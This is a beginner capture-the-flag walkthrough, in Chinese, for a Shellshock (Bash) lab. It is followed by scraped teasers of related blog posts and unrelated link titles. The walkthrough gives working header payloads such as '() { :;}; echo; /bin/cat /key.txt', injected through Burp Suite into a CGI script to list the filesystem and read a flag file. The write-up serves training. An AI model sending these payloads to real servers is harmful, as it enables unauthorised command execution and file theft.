墨者靶场 初级:Bash漏洞分析溯源

  • 题目
  • 背景介绍
  • 实训目标
  • 解题方向
  • 解题步骤

题目

背景介绍

安全工程师"墨者"对一单位业务系统进行授权测试,在测试过程中,发现存在bash命令执行漏洞。

实训目标

1、了解bash;
2、了解Bash远程命令执行漏洞形成原因;
3、了解Bash远程命令执行漏洞利用方法;

解题方向

找到poc.cgi文件

解题步骤

启动靶场,打开链接访问,是一个显示页面。

Bash漏洞存在的路径多数在网页/cgi-bin/下,打开此网页。

http://url/cgi-bin/poc.cgi


此漏洞是存在的,使用burp suite抓包。

把在下面的Connection的参数,改成我们的执行代码。

Connection: () { :;}; echo; /bin/ls /


发送,发现key.txt文件,同上查看该文件。

Connection: () { :;}; echo; /bin/cat /key.txt


获得key值,提交即可。

墨者靶场 初级:Bash漏洞分析溯源相关推荐

  1. 墨者学院-Bash漏洞分析溯源

    Bash漏洞分析溯源 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器.wwwscan 1.打开靶场,根据题目思路找poc.cgi. 2.使用wwwscan扫一下 发现有目录/cgi ...

  2. 墨者学院_BeesCMS系统漏洞分析溯源

    墨者学院--BeesCMS系统漏洞分析溯源 1.打开用御剑扫描出admin/login.php登录界面 2.输入1'报错,存在注入 3.在user处构造代码直接写入shell,注意验证码是要最新的 4 ...

  3. 墨者网络安全——投票常见漏洞分析溯源

    操作步骤: 1.打开靶场,点击投票,可以发现弹出一个需要微信投票,说明我们的修改use-agrent为微信内嵌浏览器,前面的实验有说到,也可以自行百度: 除了要修改use-agrent外,我们还需要添 ...

  4. 墨者学院 - CMS系统漏洞分析溯源(第9题)

    CMS系统漏洞分析溯源(第9题) 本题就是利用了discuz 7.2 中的faq.php文件sql注入漏洞的一个0day 下载exp 利用 admin用户的密码无法破解,所以直接用webshell的链 ...

  5. 墨者学院 - Bash漏洞分析溯源

    bash漏洞技术层面分析 漏洞起源: 漏洞信息最早来源于国外知名漏洞网站exploit-db下的第34765篇漏洞报告,其中出现了一条验证命令: env x='() { :;}; echo vulne ...

  6. 墨者 - Bash漏洞分析溯源

    bash代码注入的安全漏洞分析 bash的环境变量 环境变量是操作系统运行shell中的变量,很多程序的运行需要获取系统的环境变量参数.具体赋值格式如下: $ var="hello worl ...

  7. Bash漏洞分析溯源

    漏洞简介 Bash(GNU Bourne-Again Shell)是一个命令处理器,通常运行于文本窗口中,并能执行用户直接输入的命令.Bash还能从文件中读取命令,这样的文件称为脚本. 1.bash漏 ...

  8. [ 墨者学院 ] 命令执行——Bash漏洞分析溯源

    0x00.题目描述: 背景介绍 安全工程师"墨者"对一单位业务系统进行授权测试,在测试过程中,发现存在bash命令执行漏洞. 实训目标 1.了解bash: 2.了解Bash远程命令 ...

  9. Bash漏洞分析溯源 cgi文件 (CVE-2014-6271) --墨者学院

    01 背景介绍 Bash脚本在解析某些特殊字符串时出现逻辑错误导致可以执行后面的命令,在一些cgi脚本中,数据是通过环境变量来传递的,这样就会形成该漏洞: bash通过以函数名作为环境变量名,以&qu ...

最新文章

  1. 第十六天-企业应用架构模式-离线并发模式
  2. OpenResty简介
  3. 在阅读文献中提高升华自己--转
  4. 34篇Java基础总结博客陪博主入门Java
  5. Jmeter与ant整合生成美观的测试报告
  6. CSS学习摘要-数值和单位及颜色
  7. interface接口实例
  8. js中var、let、const区别
  9. Matplotlib 中文显示方框 最简单解决方案
  10. 2021-06-01 深入分析锁升级流程的基础
  11. 大豆叶片病害检测与分类系统
  12. JSP文件过大编译失败 异常is exceeding the 65535 bytes limit错误
  13. 计算机软件的著作权和专利权法律保护资料
  14. 简单的APP与PLC通讯
  15. 百度技术:“App 优化网络,先从 HTTPDNS 开始” | 原理到实战
  16. 保险丝的常用规格型号及主要参数说明
  17. android 路由器 操作系统,小米全新路由器操作系统是什么?支持什么语言?
  18. 让职场人心惊胆战的职场“黑话大全” 您知多少?
  19. php做微信支付和支付宝支付的方法
  20. 从联想昭阳到MacBook Pro,致我的那些败家玩意—

热门文章

  1. spark编程基础python版 pdf_Spark编程基础Python版-第5章-Spark-SQL.pdf
  2. 51单片机有几个通用io口_51单片机IO端口基础知识及应用
  3. 戴森球计划 超级计算机,戴森球计划无限资源
  4. 聚焦乌镇:世界互联网大会,领先成果发布集锦
  5. web sso 单点登录简单实例源码
  6. 手机最完美的root方法
  7. Ubuntu18.04 安装 sublime3
  8. [BZOJ 3938] Robot
  9. android 集成环信SDK
  10. 集成环信sdk步骤(即时通讯)